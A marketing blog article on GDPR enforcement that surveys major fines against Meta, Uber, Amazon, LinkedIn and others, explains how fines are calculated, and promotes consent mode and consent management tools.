Your One-Stop Source for the Latest PPC News
Your One-Stop Source for the Latest PPC News
B Blog
0
Share

Consent Mode Fines: Why Ignoring GDPR and Other Privacy Laws Is Risky

May 4, 2025
A balanced scale with a shield at its center, surrounded by warning signs, documents, coins with a euro symbol, and legal icons, symbolizing financial and legal risks like a potential GDPR fine.
Table of Contents Hide
  1. Major GDPR Penalties for Non-Compliance
    1. Meta
    2. Uber
    3. Apple
    4. Amazon
    5. LinkedIn
    6. British Airways
    7. Criteo
  2. GDPR Fines for Small Businesses
    1. Examples of Fines for Small Businesses
    2. Common Reasons for SMB Fines
  3. GDPR Fines for Individuals
  4. How GDPR Fines Are Calculated
  5. The Largest GDPR Fine to Date
  6. The Latest GDPR Fine
  7. GDPR Fine Statistics
  8. Why These Fines Matter
    1. 1. Record-breaking Enforcement Numbers
    2. 2. Consumers Are Fighting for Their Rights
    3. 3. Big Tech Is Feeling the Heat
    4. 4. Consent and Transparency Are Under the Microscope
  9. The Future of GDPR Fines
    1. Related posts:
A balanced scale with a shield at its center, surrounded by warning signs, documents, coins with a euro symbol, and legal icons, symbolizing financial and legal risks like a potential GDPR fine.

If there was ever any doubt about how seriously regulators take data protection, recent years have put that to rest. Since the General Data Protection Regulation (GDPR) came into effect in 2018, enforcement has reached an all-time high, and fines now total billions of euros.

Big names like Uber, Meta, and LinkedIn have been hit with some of the largest penalties in privacy law history, showing that no company is too big to be held accountable.

Meanwhile, data protection authorities are receiving more consumer complaints than ever, signaling a shift in how individuals defend their digital rights.

Let’s break down the GDPR fines.

Major GDPR Penalties for Non-Compliance

Meta

  • Meta (Facebook’s parent company) has faced multiple GDPR fines over the years:
DateAmountAuthorityReason
May 2023€1.2 billionIrish DPC/EDPBUnlawful data transfers to US (GDPR)
December 2024€251 millionIrish DPC2018 data breach exposing user tokens (GDPR)
October 2024€91 millionIrish DPCStoring passwords in plain text (GDPR)
Early 2023€390 millionIrish DPCForced personalized ads (GDPR)
September 2022€405 millionIrish DPCMishandling of children’s data (GDPR)
April 2025€200 millionEuropean CommissionFailure to offer genuine data privacy choice (Digital Markets Act)

Uber

  • Uber was fined in 2018, and later again on December 11, 2023 and July 22, 2024 (just seven months apart)
  • The first fine in 2018 was for Uber not reporting a big data breach. They did not report it within the required 72 hours after they found out, as the GDPR requires.
  • The investigations leading to the second and third fines began after more than 170 French Uber drivers filed complaints. Uber transferred sensitive personal data about their European drivers to its US headquarters.
  • The third fine was given because Uber did not fix the problems from the second fine. This shows that regulators do not tolerate repeated violations.
DateFine AmountAuthorityReason
2018€600,000Dutch DPA (AP)Data breach
11 December 2023€10 millionDutch DPA (AP)Breaches related to informing drivers
22 July 2024€290 millionDutch DPA (AP)Issued due to continued non-compliance following the second fine

Apple

  • Apple received 4 major fines between 2022 and 2025, totaling hundreds of millions of euros.
  • The violations covered issues from unlawful ad tracking to anti-competitive behavior.
  • The largest fine in 2025 was for anti-competitive practices. This was under the Digital Markets Act and France’s competition law. The fine was also for privacy violations. The company failed to get proper user consent for advertising identifiers.
DateFine AmountAuthorityReason
31 March 2025€150 millionFrench Competition AuthorityAbuse of dominant position via ATT; unfair advantage for Apple’s own services
23 April 2025€500 millionEuropean CommissionBreach of DMA anti-steering rules; restricting developers from informing users about alternatives
29 December 2022€8 millionCNIL (France)Failure to obtain valid consent for ad identifiers (IDFA) on iOS devices; ePrivacy violation

Amazon

  • The €746 million fine was given on July 15, 2021. Luxembourg’s National Commission for Data Protection (CNPD) imposed it. The court confirmed the fine on March 18, 2025, after Amazon’s appeal was rejected.
  • Investigators found that Amazon unlawfully processed personal data for personalized advertising without valid user consent.
  • This case shows that national regulators across Europe are actively stepping up enforcement.

LinkedIn

  • The Irish Data Protection Commission (DPC) watches over many tech companies with their EU headquarters in Ireland. They issued a big fine against LinkedIn.
  • The DPC concluded that LinkedIn unlawfully processed users’ personal data for behavioral analyzing and targeted advertising. LinkedIn mentioned consent, legitimate interests, and contractual necessity as reasons. However, the DPC did not find any of these valid in this case.
  • Authorities fined LinkedIn €310 million for violations of the EU’s General Data Protection Regulation (GDPR).
  • The decision reinforces Ireland’s role as a major enforcer of GDPR in the tech space.

British Airways

  • The UK Information Commissioner’s Office (ICO) fined British Airways on October 16, 2020. This was for a major personal data breach.
  • The ICO found that BA failed to implement basic security measures.
  • The breach occurred in 2018 and affected over 400,000 customers and staff. Attackers got into personal and financial details. They also changed a script on the airline’s website. This redirected customer payment data to a domain they controlled. The breach went undetected for over two months.
  • The original fine of £183.39 million was lowered to £20 million. This change happened because of BA’s cooperation and the financial effects of COVID-19.

Criteo

  • On June 15, 2023, the French Data Protection Authority (CNIL) fined Criteo €40 million for multiple GDPR violations.
  • The investigation followed 2018 complaints by NOYB and Privacy International regarding Criteo’s ad-tracking and behavioral targeting practices. Criteo did not make sure that users gave valid consent for personalized ads. They relied on partner sites but did not check if consent was obtained.

GDPR Fines for Small Businesses

GDPR applies to all organizations processing personal data of EU residents, regardless of size. Therefore, small and medium-sized businesses (SMBs) also face fines. However, these fines are usually lower than those for large multinationals.

Fines for SMBs can still be significant enough to impact their operations and reputation.

Examples of Fines for Small Businesses

  • Tax Return Limited: Tax Return Limited was fined €200,000. They sent millions of unwanted text messages. This happened between July 2016 and October 2017. They did not have valid consent. Relied on third-party data without verifying permission, breaching PECR and GDPR. The ICO found the consent unclear and the companies unnamed in privacy policies.
  • DM Design Bedrooms Ltd.: Fined €160,000 for unsolicited marketing calls to TPS-registered numbers between April and November 2017. Failed to screen call lists properly, ignored Do Not Call requirements, and relied on unchecked data sources. This was their second fine, indicating no corrective action after the first.
  • Lifestyle Marketing, Mother & Baby Ltd.: Fined €140,000 for selling personal data of over a million people to Experian, which was later used by the Labour Party to profile new mothers before the 2017 UK election. Users weren’t informed their data could be used for political marketing, breaching data protection law.
  • Secure Home Systems: Fined €80,000 for marketing calls to TPS-registered consumers without proper screening. The company relied on third-party data without checking it. It also failed to update its database. This led to many complaints because it ignored due diligence.
  • Eldon Insurance Services Limited: Fined €60,000 for two unlawful marketing campaigns involving over one million emails sent without valid consent and nearly 300,000 political messages using Eldon Insurance customer data. Failed to separate insurance and political data, breaching GDPR and PECR.

Common Reasons for SMB Fines

  • Unlawful transfer of data to third parties1.
  • Sending marketing communications without proper consent.
  • Failing to obtain valid consent for data processing.
  • Inadequate data security measures leading to breaches.
  • Collecting or retaining unnecessary personal data.

GDPR Fines for Individuals

Individuals can also be fined under GDPR, but this is rare and typically reserved for serious or intentional violations.

The regulation says that “any person or business” can be held responsible. This includes individuals who are sole traders, business owners, or professionals.

Individuals acting solely for personal or household purposes are not subject to fines.

Fines for individuals range from a few thousand euros to €10,000. These fines can occur for several reasons. They can happen if you share personal data incorrectly. They can also happen if you reveal sensitive information without hiding it. Additionally, ignoring data protection responsibilities at work can lead to fines.

How GDPR Fines Are Calculated

GDPR fines are not fixed amounts. They’re determined case by case using a structured methodology to ensure they are effective, proportionate, and dissuasive.

Supervisory authorities follow a five-step process outlined by the European Data Protection Board (EDPB).

  1. Identify the Infringing Behavior: Authorities determine which processing operations violated the law and whether the case involves single or multiple infringements.
  2. Set a Starting Point: It’s determined by the nature and seriousness of the violation, the specific GDPR provisions breached, and the company’s global turnover.
  3. Adjust for Aggravating or Mitigating Factors: These factors may include:
    • Past violations or repeat offenses (aggravating)
    • Cooperation, fast remediation, or technical improvements (mitigating)
  4. Setting the Fine Considering Legal Maximums: The calculated fine must not exceed the GDPR’s legal cap. There are two tiers of GDPR maximum fines, based on the severity of the violation:
    • Lower Tier: Up to €10 million or 2% of global annual turnover (whichever is higher) for violations such as insufficient security measures, failure to notify breaches, administrative non-compliance (e.g., record-keeping).
    • Higher Tier: Up to €20 million or 4% of global annual turnover (whichever is higher) for severe breaches, including unlawful data processing, violations of data subject rights (e.g., consent, access, erasure), unauthorized international data transfers.
  5. Final Review for Effectiveness, Proportionality, and Deterrence: Authorities assess whether the fine is effective, proportionate to the severity of the violation, and strong enough to deter future non-compliance.

There is no minimum fine. Each case is reviewed individually, and fines are based on the full corporate group’s turnover, not just a local subsidiary.

A flowchart titled "How GDPR Fines Are Calculated" shows five steps: identify infringing behavior, set gdpr fine starting point, evaluate factors, set fine considering legal maximums, and conduct final review with brief descriptions for each step.

The Largest GDPR Fine to Date

The biggest GDPR fine to date of €1.2 billion was imposed on Meta (Facebook’s parent company) by the Irish Data Protection Commission (DPC) in May 2023.

The fine stemmed from Meta’s unlawful transfer of European users’ personal data to the United States without sufficient safeguards and violating GDPR’s rules on international data transfers.

Coming in second place is Amazon, fined €746 million in July 2021 by Luxembourg’s data protection authority for processing personal data for behavioral advertising without valid user consent.

In third place sits Meta’s Instagram, hit with a €405 million fine in September 2022. This case focused on the mishandling of children’s personal data, including public default settings for underage accounts and the exposure of contact information.

An infographic highlights the top 3 largest GDPR fines: Facebook (€1.2B), Amazon (€746M), and Instagram (€405M). Each company's logo and gdpr fine amount are displayed on a podium for clear comparison.

The Latest GDPR Fine

In May 2025, Orange Espagne was fined €1.2 million by the Spanish Data Protection Authority (AEPD) for unlawful data processing linked to SIM-swapping fraud.

The penalty was for unlawful data processing, where a franchise employee issued a duplicate SIM card without the customer’s consent, enabling attackers to steal money from the victim’s accounts. 

GDPR Fine Statistics

  • Since its enforcement in May 2018, GDPR fines have reached approximately €5.88 billion by January 2025 (GDPR Local, 2025)
  • The Irish Data Protection Commission (DPC) is the most active regulator, issuing €3.5 billion in fines, which is over four times more than the next highest authority, the Luxembourg Data Protection Authority (Infosecurity Magazine, 2025)
  • The largest single GDPR fine to date is €1.2 billion, imposed on Meta (Facebook) in May 2023 for transferring EU user data to the US without adequate safeguards (Data Privacy Manager, 2025)
  • The media, telecoms, and broadcasting sector has faced the highest total fines, around €4 billion since 2018 (Statista, 2025)
  • Despite the high total value of fines, only about 1.3% of cases before EU Data Protection Authorities (DPAs) result in a fine (NOYB, 2025)

Why These Fines Matter

1. Record-breaking Enforcement Numbers

  • GDPR fines have exceeded billions of euros since its inception, and enforcement is only increasing.
  • The penalties are getting bigger and more frequent, signaling that regulators aren’t holding back.
  • Repetitive violations are viewed by regulators as a sign of systemic non-compliance and result in higher fines.

2. Consumers Are Fighting for Their Rights

  • European data protection agencies report a growing number of complaints from individuals who are becoming more aware of their privacy rights.
  • More complaints = more investigations = more enforcement actions.

3. Big Tech Is Feeling the Heat

  • With major platforms like Meta, Uber, and LinkedIn under scrutiny, regulators are proving that even the biggest players must follow the rules.
  • Companies can no longer afford to view GDPR as just another compliance checkbox—violating it now comes with a real financial risk.
  • Many of the most significant fines are tied to failures in obtaining valid user consent and providing clear information about data use.
  • Regulators are cracking down on companies that collect data without proper user permission or fail to explain what they’re doing with it.
  • Consent mode was introduced to help businesses adjust how they collect and use data based on user consent, ensuring compliance with GDPR and other privacy regulations while maintaining website functionality.
  • Both Google Consent Mode and Microsoft Consent Mode are now mandatory for continued access to their important advertising features in Europe, making proper implementation a compliance requirement for businesses using their platforms.
  • Using a Consent Management Platform (CMP) like Cookiebot helps businesses collect, manage, and document valid user consent in line with GDPR and other privacy laws.

The Future of GDPR Fines

Regulators are only getting stricter, consumers are demanding greater accountability, and businesses can’t afford to treat data privacy as an afterthought. With fines reaching historic levels, the message is loud and clear: Comply with GDPR or pay the price.

Related posts:

Share this article
0
Share
0
0
0
0
0
0
0
0
0
Shareable URL
Read next